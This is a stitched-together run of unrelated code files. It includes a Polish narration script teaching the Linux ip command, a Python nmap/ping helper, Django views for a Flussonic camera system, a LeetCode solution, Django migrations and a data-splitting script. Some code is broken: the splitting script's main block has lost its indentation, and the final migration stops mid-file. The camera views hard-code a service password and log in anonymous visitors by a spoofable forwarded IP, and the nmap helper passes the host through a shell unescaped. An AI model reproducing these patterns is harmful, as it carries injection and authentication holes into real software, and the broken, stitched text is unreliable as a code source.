'Domyślnym działaniem, jeżeli ciąg argumentów zakończymy na określeniu <m> tego zbioru, jest wypisanie informacji na temat wskazanego zbioru. <m>'
]
},
{
'console': [
[0.0, eduMovie.prompt()],
[0.058368, "o", "i"],
[0.314328, "o", "p"],
[0.690461, "o", " "],
[0.978361, "o", "a"],
[1.298309, "o", "d"],
[1.45029, "o", "d"],
[1.738358, "o", "r"],
[2.12497, "o", "\n\r" + eduMovie.markLines(code_ipa_output, edit=False)],
[2.126245, "o", eduMovie.prompt()],
["ipa_eth1", "o", eduMovie.editBegin(7) + " link/ether " + eduMovie.markBegin + "f4:6d:04:4e:ad:e8" + eduMovie.markEnd + " brd ff:ff:ff:ff:ff:ff" + eduMovie.editEnd(7)],
["ipa_eth2", "o", eduMovie.editBegin(7) + " link/ether f4:6d:04:4e:ad:e8 brd " + eduMovie.markBegin + "ff:ff:ff:ff:ff:ff" + eduMovie.markEnd + eduMovie.editEnd(7)],
["ipa_inet1", "o", eduMovie.editBegin(7) + " link/ether f4:6d:04:4e:ad:e8 brd ff:ff:ff:ff:ff:ff" + eduMovie.editEnd(7)],
["ipa_inet1", "o", eduMovie.editBegin(6) + " " + eduMovie.markBegin + "inet" + eduMovie.markEnd + " 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet2", "o", eduMovie.editBegin(6) + " inet " + eduMovie.markBegin + "192.168.6.3/24" + eduMovie.markEnd + " brd 192.168.6.255 scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet3", "o", eduMovie.editBegin(6) + " inet 192.168.6.3/24 brd " + eduMovie.markBegin + "192.168.6.255" + eduMovie.markEnd + " scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet4", "o", eduMovie.editBegin(6) + " inet 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet6", "o", eduMovie.editBegin(4) + " " + eduMovie.markBegin + "inet6" + eduMovie.markEnd + " 2001:0db8::6411:f66d:4ff:fe4e:ade8/64 scope global dynamic mngtmpaddr" + eduMovie.editEnd(4)],
["ipa_inet7", "o", eduMovie.editBegin(4) + " inet6 " + eduMovie.markBegin + "2001:0db8::6411:f66d:4ff:fe4e:ade8/64" + eduMovie.markEnd + " scope global dynamic mngtmpaddr" + eduMovie.editEnd(4)],
["ipa_inet8", "o", eduMovie.editBegin(4) + " inet6 2001:0db8::6411:f66d:4ff:fe4e:ade8/64 scope global dynamic mngtmpaddr" + eduMovie.editEnd(4)],
["ipa_inet8", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [10, 12], edit=False) + eduMovie.prompt()],
["ipa_local", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [12], edit=False) + eduMovie.prompt()],
["ipa_global", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [10], edit=False) + eduMovie.prompt()],
["ipa_updown1", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [6], edit=False) + eduMovie.prompt()],
["ipa_updown2", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, edit=False) + eduMovie.prompt()],
["ipa_updown2", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST," + eduMovie.markBegin + "UP,LOWER_UP" + eduMovie.markEnd + "> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_updown3", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST," + eduMovie.markBegin + "UP" + eduMovie.markEnd + ",LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_updown4", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST,UP," + eduMovie.markBegin + "LOWER_UP" + eduMovie.markEnd + "> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_add", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_add", "o", eduMovie.prompt() + "sudo ip addr add 10.0.71.113/20 dev eth0"],
["ipa_add + 2.3", "o", "\n\r" + eduMovie.prompt()],
["ipa_add + 2.5", "o", "\n\r" + eduMovie.prompt()],
["ipa_add + 3.3", "o", "ip addr"],
["ipa_add + 3.9", "o", "\n\r" + eduMovie.markLines(code_ipa_output2 + eduMovie.prompt(), edit=False)],
["ipa_del", "o", eduMovie.prompt() + "sudo ip addr del 10.0.71.113/20 dev eth0"],
["ipa_delX", "o", "^C\n\r" + eduMovie.prompt()],
["ipr", "o", "ip route"],
["ipr + 1.82497", "o", "\n\r" + eduMovie.markLines(code_ipr_output2 + eduMovie.prompt(), edit=False)],
["automatycznatrasa", "o", eduMovie.markLines(code_ipr_output2 + eduMovie.prompt(), [1])],
#["automatycznatrasa2", "o", eduMovie.markLines(eduMovie.runCommandString(r"sipcalc 10.0.71.113/20"), [11], edit=False)]
],
'text' : [
'Polecenie ip address, ip addr lub jeszcze krócej ip a wypisze informację <m> na temat adresów na poszczególnych interfejsach. <m>'
'Warto wspomnieć o tym jakie informacje podało nam takie wywołanie polecenia ip. <m>'
'Widzimy <mark name="ipa_eth1" /> adres <ethernetowy>[eternetowy] wraz z <mark name="ipa_eth2" /> <ethernetowym>[eternetowym] adresem rozgłoszeniowym. <m>'
'<mark name="ipa_inet1" />Jako inet podawany <mark name="ipa_inet2" /> jest adres IPv4 wraz z długością prefixu <mark name="ipa_inet3" />'
'oraz adresem rozgłoszeniowym <mark name="ipa_inet4" /> oraz dodatkowymi informacjami o tym adresie. <m>'
'<mark name="ipa_inet6" /> Jako <inet6>[inet sześć] podawany <mark name="ipa_inet7" /> jest adres IPv6 wraz z długością prefixu. <mark name="ipa_inet8" />'
'Widzimy że mamy dwa adresy IPv6 – jeden z nich rozpoczyna się <mark name="ipa_local" /> od prefiksu fe80 i jest adresem link-local, <m>'
'co zresztą sama komenda ip nam zaznacza pisząc <"scope link">[skołp link], <mark name="ipa_global" /> drugi jest już standardowym routowalnym adresem IPv6 o zasięgu globalnym, czyli <"scope global">[skołp global]. <mark name="ipa_updown1" />'
'Wynik komendy również podaje także pewne informacje <m> na temat interfejsu warstwy niższej, najbardziej użytecznymi są informacje <mark name="ipa_updown2" /> up / down, lower up / lower down. <mark name="ipa_updown3" />'
'Pierwsze z nich odnoszą się do konfiguracyjnego <m> włączenia / wyłączenia interfejsu sieciowego. <mark name="ipa_updown4" />'
'Lower up lub down informuje nas o tym czy dostępne jest medium transmisyjne <m> na którym warstwa niższa funkcjonuje, czy też nie jest dostępne. <m>'
'Na przykład jeżeli w przypadku interfejsu przewodowego wyjmiemy kabel <m> <ethernetowy>[eternetowy] to pojawi się tutaj lower down. <mark name="ipa_add" />'
'Jeżeli polecenie to rozbudujemy do postaci ip address add <m> lub krócej ip <break time="80ms"/> a <break time="100ms"/> a, to będziemy mogli użyć go do dodania <m> wskazanego adresu na wskazany po nim interfejs. <m>'
'Oczywiście działania inne niż wyświetlanie jakiś informacji, <m> będą wymagały stosownych uprawnień, najczęściej uprawnień <root’a>[ruta]. <m>'
'Na pojedynczym interfejsie może być skonfigurowanych wiele różnych adresów. <mark name="ipa_del" />'
'W podobny sposób, pisząc ip address del, możemy usuwać adresy z interfejsu, <mark name="ipa_delX" /> ale nie róbmy tego jeszcze w tej chwili. <mark name="ipr" />'
'Output polecenia ip route znany nam jest już <m> z omawiania zagadnień związanych z tablicą routingu, <m> bo właśnie informacje na jej temat wypisuje to polecenie. <m>'
'Domyślnie wypisuje tablicę dla IPv4, <m> aby uzyskać tablicę dla IPv6 należy dodać opcję -6. <m>'
'Tutaj także, podobnie jak w ip a, możemy skrócić route do litery r <m> i możemy także dodawać i usuwać trasy routingowe. <m>'
'Dzięki temu że nie usunęliśmy jeszcze dodanego niedawno adresu, <mark name="automatycznatrasa" />'
'widzimy iż z każdym adresem ustawionym na interfejsie <m> wiąże się trasa routingowa do sieci w której znajduje się ten adres. <mark name="automatycznatrasa2" />'
'Sieć ta jest zdefiniowana przez prefix określony w tym adresie, <m> o długości podanej przy jego ustawianiu na danym interfejsie. <m> '
]
},
{
'image': [
[0.0, eduMovie.convertFile('polecenie_ip_2.tex', negate=True)],
["slajd2", eduMovie.convertFile('polecenie_ip_3.tex', negate=True)],
],
'text' : [
'Polecenie ip link wypisze nam informacje o interfejsach L2, <m> z odpowiednimi wywołaniami umożliwia włączanie i wyłączanie takich interfejsów, <m> zmienianie adresów L2, konfiguracje <VLANów>[vi lanów] tagowanych. <m>'
'Włączenie, wyłączenie interfejsu odbywa się za pomocą poleceń <m> up i down wykonanych na wskazanym interfejsie. <m>'
'Konfiguracja <VLANów>[vi lanów] polega na utworzeniu interfejsu typu <VLAN>[vi lan] <m> z określonym id (czyli tym <12>[dwunasto] bitowym numerem <VLANu>[vi lanu]) <m> na danym interfejsie sieciowym. <m>'
'Typowo interfejsy związane z <VLANami>[vi lanami] nazywa się od nazwy interfejsu bazowego <m> dodając do niej po kropce numer wskazanego <VLANu>[vi lanu], ale jest to jedynie konwencja. <mark name="slajd2" />'
'Ponadto polecenie to pozwala utworzyć programowy <m> (czyli realizowany na poziomie systemu operacyjnego) <m> switch złożony z kilku interfejsów sieciowych. <m>'
'W tym celu należy utworzyć interfejs typu bridge <m> i następnie dodać do niego interfejsy wchodzące w skład takiego switcha, <m> tak jak pokazano na ekranie. <m>'
"Do zarządzania switch'ami programowymi przydatne może być też polecenie bridge. <m>"
'Polecenie ip umożliwia też konfigurowanie, wspomnianych przy omawianiu sieci ethernet, <m> <trunków>[tranków] złożonych z kilku interfejsów sieciowych. <m>'
"Podobnie jak przy bridge'ach należy tutaj utworzyć interfejs typu bond <m> i dodać do niego odpowiednie interfejsy składowe. <m>"
]
},
{
'image': [
[0.0, eduMovie.convertFile('polecenie_ip_old_new.tex', negate=True)],
],
'text' : [
'Na wielu systemach nadal są dostępne klasyczne komendy <m> służące konfiguracji sieci takie jak: ifconfig <m> (który odpowiada za funkcjonalność ip address <m> oraz włączanie i wyłączanie interfejsów), <m>'
'route (który odpowiada za obsługę tablic routingu), <m> <vconfig>[V config] (do konfiguracji <VLANów>[vi lanów]), <m> <brctrl>[BR ctrl] (do konfiguracji bridge) i ifenslave (do konfiguracji bondów). <m>'
'Warto jednak mieć świadomość istnienia komend ifconfig oraz route, <m> ponieważ na wielu innych systemach uniksowych w ten sposób konfiguruje się sieć, <m> jednak składnia tych komend jest różna na różnych systemach. <m>'
'Natomiast w Linuxach całość funkcjonalności tych poleceń przejęta została <m> przez komendę ip i również coraz częściej polecenia te nie są <m> standardowo instalowane na nowych systemach. <m>'
]
},
{
'image': [
[0.0, eduMovie.convertFile('polecenie_tc_i_wifi.tex', negate=True)],
],
'text' : [
'Innym poleceniem związanym z konfiguracją sieci, <m> którego szczegółowo nie będziemy omawiać, <m> jest tc od Traffic Control. <m>'
'Umożliwia ono konfigurację ustawień kontroli przepływu <m> - na przykład kolejkowania, związanych z tym prędkości ruchu i tak dalej <m> na poszczególnych interfejsach sieciowych. <m>'
'Przydatny jest jeżeli nasz Linux ma pełnić funkcje routingowe <m> i mamy potrzebę na przykład regulacji bądź ograniczenia <m> przepustowości na konkretnych interfejsach. <m>',
"Należy wspomnieć także o narzędziach używanych do konfiguracji sieci bezprzewodowych takich jak <m>"
"<iwconfig>[I W config] obsługujący podstawowe operacje na interfejsie bezprzewodowym, <m>"
"<iwlist>[I W list] służący do listowania widocznych sieci i informacji o nich <m>"
"oraz <wpa_supplicant>[W P A supplicant] służący do łączenia się z sieciami zabezpieczonymi WPA. <m>"
"Możliwe jest też uczynienie z komputera z linuxem i kartą wi-fi <m> access <pointa>[pojta] przy pomocy programu <hostapd>[host A P D]. <m>"
"Jeżeli chcemy oferować DHCP i DNS przyda się także <dnsmasq>[DNS mask]. <m>"
'Konfiguracja interfejsów dokonywana poleceniami ip, <m> jego klasycznymi odpowiednikami, poleceniem tc i innymi tego typu komendami <m> jest konfiguracją typu <run-time>[rantajm], czyli jest tracona po wyłączeniu systemu. <m>'
'W związku z tym polecenia te często zapisywane są w postaci plików, <m> będących skryptami powłoki uruchamianymi w trakcie startu systemu operacyjnego. <m>'
'A jeszcze częściej wykorzystywane są pliki konfiguracyjne <m> (specyficzne dla danej rodziny dystrybucji Linuxa), <m>'
"które są <parsowane>[pars'owane] przez skrypty uruchomieniowe celem wykonania <m> w oparciu o ich treść odpowiedniej konfiguracji interfejsów. <m>",
]
},
]
|
import platform
import subprocess
def check_os():
    """Exit the interpreter unless running on Linux.

    The original used a Python 2 `print` statement, which is a SyntaxError
    on Python 3.
    """
    if platform.system().lower() != "linux":
        print("The script you're trying to run is for Linux only")
        quit()
def ssh_available(host):
    """Return True when nmap's scan of *host* mentions an ssh service.

    SECURITY NOTE(review): *host* is interpolated into a shell command;
    only call with trusted input, or switch to
    subprocess.check_output(["nmap", host]).
    """
    command = "nmap %s" % host
    # universal_newlines=True decodes the output to str: on Python 3,
    # check_output returns bytes, so `"ssh" in output` used to TypeError.
    output = subprocess.check_output(command, shell=True,
                                     universal_newlines=True)
    if "ssh" in output:
        return True
    print("ssh is not running on", host)
    return False
def host_is_pingable(host):
    """Return True when *host* answers ping (2 probes); else report and return False."""
    command = "ping -c 2 %s" % host
    # subprocess.DEVNULL replaces open("/dev/null", "w"), which leaked a
    # file handle on every call; print() fixed from Python 2 syntax.
    if subprocess.call(command, shell=True,
                       stdout=subprocess.DEVNULL,
                       stderr=subprocess.STDOUT) == 0:
        return True
    print(host, "is DOWN")
    return False
def util_finder(util, ssh):
    """Locate *util* on the remote host by running `which` over *ssh*.

    Returns the last line of `which`'s output (stripped), or "" when the
    utility is not found.
    """
    _, stdout, _ = ssh.exec_command("which %s" % util)
    location = ""
    for line in stdout:
        location = line.rstrip()
    return location
|
from django.shortcuts import render, redirect
from django.urls import reverse, reverse_lazy
from django.contrib import messages
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView, View, TemplateView
from django.contrib.auth.views import LoginView, LogoutView
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth import authenticate, login
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.core.exceptions import ObjectDoesNotExist
from django.utils.datastructures import MultiValueDictKeyError
from .models import *
from .forms import *
import transliterate
import requests
import os
import sys
import locale
# Create your views here.
def home(request):
    """Render the camera index page, auto-logging-in clients known by IP."""
    context = {
        'list_cameras': Cameras.objects.all()
    }
    template = 'index.html'

    def get_client_ip(request):
        # Prefer X-Forwarded-For (proxy-aware), fall back to the socket address.
        x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
        if x_forwarded_for:
            return x_forwarded_for.split(',')[0]
        return request.META.get('REMOTE_ADDR')

    # If the visitor is anonymous, try to authenticate them by a stored IP
    # (replaces the `request.user == AnonymousUser()` comparison with the
    # idiomatic check; all three branches rendered the same page, so the
    # triplicated return collapses to one).
    if request.user.is_anonymous:
        try:
            user = CustomUser.objects.get(ip_address=get_client_ip(request))
            login(request, user)
        except ObjectDoesNotExist:
            pass  # unknown IP: stay anonymous, still render the page
    return render(request, template, context)
class DVR(DetailView):
    """Detail page for a single Cameras record."""
    model = Cameras
    template_name = 'cameras/detail.html'
    context_object_name = 'get_cameras'
class CustomSuccessMessageMixin:
    """Mixin that flashes `success_msg` via django.contrib.messages when a form validates."""
    @property
    def success_msg(self):
        # Subclasses override this as a plain class attribute; False = no message.
        return False
    def form_valid(self,form):
        messages.success(self.request, self.success_msg)
        return super().form_valid(form)
    def get_success_url(self):
        # Append the saved object's id so the next page can highlight it.
        return '%s?id=%s' % (self.success_url, self.object.id)
#Камеры
class AddCamera(CustomSuccessMessageMixin, CreateView):
    """Create a Cameras record and register its stream with Flussonic."""
    model = Cameras
    template_name = 'cameras/cameras.html'
    form_class = CameraForm
    success_url = reverse_lazy('cameras')
    success_msg = 'Камера добавлена'

    def get_context_data(self, **kwargs):
        kwargs['list_cameras'] = Cameras.objects.all().order_by('title')
        return super().get_context_data(**kwargs)

    def post(self, request, *args, **kwargs):
        form = self.form_class(request.POST)
        if form.is_valid():
            # Flussonic credentials/port live in the singleton Settings row
            # (id=1); the old filter-loop left the variables undefined when
            # the row was missing, producing a confusing NameError.
            settings = Settings.objects.get(id=1)
            auth = (str(settings.user_f), str(settings.pass_f))
            port = settings.port_f
            slug = transliterate.translit(request.POST['title'].lower().replace(' ', '_'), reversed=True)
            url = request.POST['url']
            dvr = request.POST['dvr']
            title = transliterate.translit(request.POST['title'], reversed=True)
            try:
                path = Storage.objects.get(id=int(request.POST['storage']))
                data = 'stream '+ str(slug) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; dvr '+ str(path) + ' '+ str(dvr) +' ; }'
            except MultiValueDictKeyError:
                # No storage selected -> register the stream without a DVR archive.
                data = 'stream '+ str(slug) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; }'
            requests.post('http://localhost:'+ str(port) +'/flussonic/api/config/stream_create', data=data, auth=auth)
            # The camera was saved twice before (save() then save() again);
            # once is enough.  The debug print(auth) leaked credentials to
            # the server log and has been removed.
            form.save()
            return HttpResponseRedirect('/cameras')
        return render(request, self.template_name, {'form': form})
class UpdateCamera(CustomSuccessMessageMixin, View):
    """Edit an existing camera and push the updated stream config to Flussonic."""
    model = Cameras
    template_name = 'cameras/cameras.html'
    form_class = CameraForm
    success_url = reverse_lazy('cameras')
    success_msg = 'Камера успешно обновлена'

    def get(self, request, slug):
        cam = Cameras.objects.get(slug__iexact=slug)
        form = CameraForm(instance=cam)
        context = {
            'form': form,
            'cam': cam
        }
        return render(request, 'cameras/editcam.html', context)

    def post(self, request, slug):
        cam = Cameras.objects.get(slug__iexact=slug)
        form = CameraForm(request.POST, instance=cam)
        if form.is_valid():
            settings = Settings.objects.get(id=1)
            auth = (str(settings.user_f), str(settings.pass_f))
            port = settings.port_f
            name = transliterate.translit(request.POST['title'].lower().replace(' ', '_'), reversed=True)
            url = request.POST['url']
            # BUG FIX: the value was bound to `date` but referenced as `dvr`
            # below, raising NameError whenever a storage was selected.
            dvr = request.POST['dvr']
            title = transliterate.translit(request.POST['title'], reversed=True)
            try:
                path = Storage.objects.get(id=int(request.POST['storage']))
                data = 'stream '+ str(name) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; dvr '+ str(path) + ' '+ str(dvr) +' ; }'
            except MultiValueDictKeyError:
                data = 'stream '+ str(name) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; }'
            requests.post('http://localhost:'+ str(port) +'/flussonic/api/config/stream_create', data=data, auth=auth)
            form.save()
            return HttpResponseRedirect('/cameras')
        # BUG FIX: render() takes (request, template_name, context); the old
        # call passed success_msg as the context argument and the real
        # context as content_type, which raised at runtime.
        return render(request, self.template_name, {'form': form})
class DelCamera(View):
    """Confirm (GET) and perform (POST) deletion of a camera and its Flussonic stream."""
    model = Cameras
    def get(self, request, slug):
        cam = Cameras.objects.get(slug__iexact=slug)
        template = 'cameras/delete_cam.html'
        context = {
            'cam': cam
        }
        return render(request, template, context)
    def post(self, request, slug):
        cam = Cameras.objects.get(slug__iexact=slug)
        data = slug
        # SECURITY NOTE(review): hard-coded Flussonic credentials and port;
        # other views read these from the Settings model — do the same here
        # or move them to environment configuration.
        response = requests.post('http://localhost:8080/flussonic/api/config/stream_delete', data=data, auth=('flussonic', 'Ff61MvET'))
        cam.delete()
        return redirect(reverse('cameras'))
class myHome(ListView):
    """List all cameras on the "my home" page."""
    model = Cameras
    template_name = 'cameras/myhome.html'
    context_object_name = 'list_cameras'
#Настройки
class Setting(View):
    """Show (GET) and update (POST) the singleton Settings row (id=1)."""
    # The invalid-form branch used to reference self.template_name, which
    # was never defined; declare it once and use it everywhere.
    template_name = 'settings.html'

    def get(self, request, pk=None):
        # `pk` is accepted for URLconf compatibility but unused — the
        # settings row is always id=1.
        setting = Settings.objects.get(id=1)
        storage = Storage.objects.all()
        form = SettingsForm(instance=setting)
        context = {
            'form': form,
            'setting': setting,
            'storage': storage
        }
        return render(request, self.template_name, context)

    def post(self, request, pk=None):
        setting = Settings.objects.get(id=1)
        form = SettingsForm(request.POST, instance=setting)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect('/settings/')
        # BUG FIX: the old call passed an undefined success_msg as render()'s
        # context argument, raising before anything was rendered.
        return render(request, self.template_name, {'form': form})
#Хранилища
class AddStorage(View):
    """Create a Storage entry: GET shows the form, POST validates and saves it."""
    model = Storage

    def get(self, request):
        return render(request, 'storage/add_stor.html', {'form': StorageForm()})

    def post(self, request):
        bound = StorageForm(request.POST)
        if bound.is_valid():
            bound.save()
            return redirect(reverse('settings'))
        # Re-display the form with validation errors attached.
        return render(request, 'storage/add_stor.html', {'form': bound})
class DelStorage(View):
    """Confirm (GET) and perform (POST) removal of a Storage entry by slug."""
    model = Storage

    def get(self, request, slug):
        record = Storage.objects.get(slug__iexact=slug)
        return render(request, 'storage/del_stor.html', {'stor': record})

    def post(self, request, slug):
        Storage.objects.get(slug__iexact=slug).delete()
        return redirect(reverse('settings'))
class UpdateStorage(View):
    """Edit a Storage entry identified by slug."""
    model = Storage
    template = 'storage/upd_stor.html'

    def get(self, request, slug):
        stor = Storage.objects.get(slug__iexact=slug)
        form = StorageForm(instance=stor)
        context = {
            'form': form,
            'stor': stor
        }
        return render(request, self.template, context)

    def post(self, request, slug):
        stor = Storage.objects.get(slug__iexact=slug)
        form = StorageForm(request.POST, instance=stor)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect('/settings')
        # BUG FIX: the old call used self.template_name (undefined — the
        # class attribute is `template`) and passed an undefined success_msg
        # as render()'s context argument.
        return render(request, self.template, {'form': form})
#class UpdateStorage(CustomSuccessMessageMixin,View):
# model = Cameras
# template_name = 'cameras.html'
##Login/Logout пользователя
class HydraLoginView(LoginView):
    """Login page using the project's AuthUserForm; always redirects home on success."""
    template_name = 'login.html'
    form_class = AuthUserForm
    success_url = reverse_lazy('home')
    def get_success_url(self):
        # Override to force success_url (ignores any ?next= parameter).
        return self.success_url
class HydraLogout(LogoutView):
    """Log the user out and return to the home page."""
    next_page = reverse_lazy('home')
#группы по анологии с тэгами
class DelGRP(DeleteView):
    """Delete a CustomGroup, flashing a success message first."""
    model = CustomGroup
    template_name = 'groups/groups.html'
    success_url = reverse_lazy('groups')
    success_msg = 'Группа удалена'
    def post(self,request,*args,**kwargs):
        # Flash before delegating.  *args/**kwargs are dropped here;
        # DeleteView resolves the target from self.kwargs (set in
        # dispatch()), so the lookup still works.
        messages.success(self.request, self.success_msg)
        return super().post(request)
class AddGRP(CustomSuccessMessageMixin, CreateView):
    """Create a CustomGroup; the page also lists all existing groups."""
    model = CustomGroup
    template_name = 'groups/groups.html'
    form_class = GroupForm
    success_url = reverse_lazy('groups')
    success_msg = 'Группа добавлена'

    def get_context_data(self, **kwargs):
        kwargs.update(list_groups=CustomGroup.objects.all().order_by('title'))
        return super().get_context_data(**kwargs)
class UpdateGRP(CustomSuccessMessageMixin, UpdateView):
    """Edit a CustomGroup; the shared template switches to "update" mode."""
    model = CustomGroup
    template_name = 'groups/groups.html'
    form_class = GroupForm
    success_url = reverse_lazy('groups')
    success_msg = 'Группа успешно обновлена'

    def get_context_data(self, **kwargs):
        kwargs.update(update=True)
        return super().get_context_data(**kwargs)
def group_detail(request, slug):
    """Render the detail page for the group whose slug matches (case-insensitive)."""
    group = CustomGroup.objects.get(slug__iexact=slug)
    return render(request, 'groups/group_detail.html', {'group': group})
# Работа с пользователями
class AddUser(CustomSuccessMessageMixin, CreateView):
    """Create a CustomUser; the page also lists every existing user."""
    model = CustomUser
    template_name = 'users.html'
    form_class = AddUserForm
    success_url = reverse_lazy('users')
    success_msg = 'Пользователь добавлен'

    def get_context_data(self, **kwargs):
        kwargs.update(list_users=CustomUser.objects.all().order_by('username'))
        return super().get_context_data(**kwargs)
class UpdateUser(CustomSuccessMessageMixin, UpdateView):
    """Edit a CustomUser's profile; the shared template switches to "update" mode."""
    model = CustomUser
    template_name = 'users.html'
    form_class = UpdateUserForm
    success_url = reverse_lazy('users')
    success_msg = 'Пользователь успешно обновлен'

    def get_context_data(self, **kwargs):
        kwargs.update(update=True)
        return super().get_context_data(**kwargs)
class DelUser(DeleteView):
    """Delete a CustomUser, flashing a success message first."""
    model = CustomUser
    template_name = 'users.html'
    success_url = reverse_lazy('users')
    success_msg = 'Пользователь удален'
    def post(self,request,*args,**kwargs):
        # Flash before delegating; DeleteView resolves the target from
        # self.kwargs (set in dispatch), so dropping *args/**kwargs is safe.
        messages.success(self.request, self.success_msg)
        return super().post(request)
class UpdatePass(CustomSuccessMessageMixin, UpdateView):
    """Change a CustomUser's password via the UpdatePassword form."""
    model = CustomUser
    template_name = 'users.html'
    form_class = UpdatePassword
    success_url = reverse_lazy('users')
    success_msg = 'Пароль успешно обновлен'

    def get_context_data(self, **kwargs):
        kwargs.update(update=True)
        return super().get_context_data(**kwargs)
#class Home(ListView):
# model = Cameras
# template_name = 'index.html'
# context_object_name = 'list_cameras'
#def login_page(request):
# if request.method == 'POST':
# form = AuthUserForm(request.POST)
# if form.is_valid():
# username = request.POST['username']
# password = request.POST['password']
# user = authenticate(username=['username'], password=['password'])
# if user is not None:
# if user.is_active:
# login(request, user)
# return HttpResponse('Authenticated successfully')
# else:
# return HttpResponse('Disabled account')
# else:
# return HttpResponse('Invalid login')
# else:
# form = AuthUserForm()
# return render(request, 'login.html', {'form': form})
|
class Solution:
    def maximalSquare(self, matrix):
        """Return the area of the largest square of '1's in a binary matrix.

        Rolling-row dynamic programming: dp[j] holds the side length of the
        largest square whose bottom-right corner sits at (current row, j-1).
        Time O(m*n), space O(n).

        The original first implementation computed rows/cols as len()+1 and
        indexed matrix[i][j] up to those bounds (IndexError on any '1'); the
        second, correct-looking variant after the first `return` was
        unreachable dead code and also failed to reset `prev` per row.
        """
        if not matrix or not matrix[0]:
            return 0
        rows, cols = len(matrix), len(matrix[0])
        dp = [0] * (cols + 1)
        best = 0
        for i in range(1, rows + 1):
            prev = 0  # dp value of the upper-left diagonal neighbour
            for j in range(1, cols + 1):
                temp = dp[j]
                if matrix[i - 1][j - 1] == '1':
                    dp[j] = min(dp[j - 1], prev, dp[j]) + 1
                    best = max(best, dp[j])
                else:
                    dp[j] = 0
                prev = temp
        return best * best
# Generated by Django 3.0.1 on 2020-07-19 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: changes userprofileinfo.profile_pic's default image and
    # upload directory.  Do not edit generated migrations by hand.
    dependencies = [
        ('accounts', '0023_auto_20200719_1546'),
    ]
    operations = [
        migrations.AlterField(
            model_name='userprofileinfo',
            name='profile_pic',
            field=models.ImageField(default='static/default.jpg', upload_to='profile_pics'),
        ),
    ]
|
import sys
import jsonlines
import random
import json
import os
from itertools import chain
from collections import defaultdict
def split_seq(seq, limit):
    """Recursively halve *seq* until every piece has at most *limit* items.

    Returns a list of the resulting pieces, in original order.
    """
    if len(seq) <= limit:
        return [seq]
    mid = len(seq) // 2
    return split_seq(seq[:mid], limit) + split_seq(seq[mid:], limit)
def validate_line(line, lookup):
    """Return True iff *line* has more than two whitespace-separated tokens
    and every token maps to a truthy value in *lookup*."""
    tokens = line.split()
    if len(tokens) <= 2:
        return False
    return all(lookup.get(tok) for tok in tokens)
if __name__ == "__main__":
input_file = sys.argv[1]
train_prop = float(sys.argv[2])
limit = int(sys.argv[3])
counts = defaultdict(int)
sequences = []
with open(input_file) as f:
for line in f.readlines():
if len(line.strip().split()) > 3:
sequences += split_seq(['<s>'] + line.strip().split(), 16)
train_par = int(len(sequences) * train_prop)
test_par = int((len(sequences) * (1-train_prop)) / 2)
random.shuffle(sequences)
train = sequences[:train_par]
dev = sequences[train_par:-test_par]
test = sequences[-test_par:]
dirname, basename = os.path.split(input_file)
print(len(train))
print(len(dev))
print(len(test))
with open(os.path.join(dirname, 'train_'+basename), 'w') as f:
f.write('\n'.join(map(lambda x: ' '.join(x), train)))
with open(os.path.join(dirname, 'test_'+basename), 'w') as f:
f.write('\n'.join(map(lambda x: ' '.join(x), test)))
with open(os.path.join(dirname, 'dev_'+basename), 'w') as f:
f.write('\n'.join(map(lambda x: ' '.join(x), dev)))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-07-25 08:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration (Django 1.10.7, 2017-07-25).

    Creates the ``BankAccount`` and ``Ownership`` models and links each
    bank account to an owner. ``Ownership`` uses the ``sites.Site``
    one-to-one relation as its primary key.
    """

    initial = True

    # Requires the django.contrib.sites tables to exist first.
    dependencies = [
        ('sites', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='BankAccount',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('street', models.CharField(max_length=100, verbose_name='Street')),
                ('postal_code', models.CharField(max_length=100, verbose_name='Postal code')),
                ('place', models.CharField(max_length=100, verbose_name='Place/City')),
                ('country_code', models.CharField(default='CH', max_length=2, verbose_name='Country code')),
                ('country_name', models.CharField(default='Switzerland', max_length=100, verbose_name='Country')),
                ('iban', models.CharField(blank=True, max_length=42, verbose_name='IBAN')),
